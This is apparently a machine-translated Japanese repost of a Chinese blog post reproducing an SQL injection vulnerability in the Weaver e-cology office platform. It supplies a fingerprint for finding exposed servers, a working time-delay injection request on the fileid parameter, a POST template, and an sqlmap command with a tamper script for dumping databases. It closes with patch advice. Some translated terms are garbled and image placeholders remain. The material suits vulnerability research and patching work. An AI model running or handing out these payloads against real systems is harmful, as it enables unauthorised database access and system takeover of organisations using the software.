Panwei E-Cology SQL インジェクションの脆弱性が再発【QVD-2023-15672】

Panwei E-Cology SQL インジェクションの脆弱性が再発【QVD-2023-15672】

免責事項: この記事に記載されている関連技術を違法なテストに使用しないでください。この記事で提供される情報やツールの普及と使用によって引き起こされる直接的または間接的な結果と損失は、ユーザー自身が負担するものとします。記事の著者とは何の関係もありません。この記事は教育のみを目的としています。

1. 製品紹介

e-cology は、汎ミクロ協調管理アプリケーション プラットフォームであり、企業情報ポータル、ナレッジ ドキュメント管理、ワークフロー管理、人事管理、顧客関係管理、プロジェクト管理、財務管理、資産管理、サプライ チェーン管理、データセンター機能を併せ持つ企業向けの大規模連携管理プラットフォーム。

2. 脆弱性の概要

Fanwei e-cology はユーザー入力を効果的にフィルタリングしなかったため、それを SQL クエリ ステートメントに直接接続し、その結果、システムに SQL インジェクションの脆弱性が発生しました。リモートの不正な攻撃者は、この脆弱性を利用して機密情報を取得し、さらにそれを悪用してターゲット システムの権限を取得する可能性があります。

3. 影響範囲

エコロジー 9.x パッチ バージョン < 10.58.0

エコロジー 8.x パッチ バージョン < 10.58.0

4. 再生環境

インターグラフのフィンガープリント:
web.icon="41eca7a9245394106a09b2534d8030df"

ここに画像の説明を挿入

5. 脆弱性の再発

実証実験

GET /weaver/weaver.file.FileDownloadForOutDoc/?fileid=123+WAITFOR+DELAY+'0:0:5'&isFromOutImg=1 HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

PS: fileid フィールドは注入ポイントであり、post と get の両方が利用可能です。テスト後、注入されるたびに fileid の値 (任意に構築できます) を置き換える必要があります。そうしないと成功しません (ご自身で試してみてください) これは、この脆弱性の弱点でもあります。

ここに画像の説明を挿入
ドラゴンPOC

ここに画像の説明を挿入
SQLmap の活用アイデア

各リクエストの乱数をトラバースしてペイロードと連携してインジェクションを実現する改ざんスクリプトを作成します。

POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

fileid=12*&isFromOutImg=1

注入してみてください:

python3 sqlmap.py -r post.txt --tamper=ecology_sql_random.py --batch --dbs

ここに画像の説明を挿入

6. 修理のご提案

一時的な緩和策
アクセス元アドレスを制限し、必要な場合以外はシステムをインターネットに公開しないでください。

アップグレードと修復計画
現在、正式なセキュリティ パッチがリリースされており、影響を受けるユーザーはできるだけ早くバージョン 10.58 以降にアップグレードすることをお勧めします。
https://www.weaver.com.cn/cs/securityDownload.asp#

おすすめ

転載: blog.csdn.net/holyxp/article/details/131868278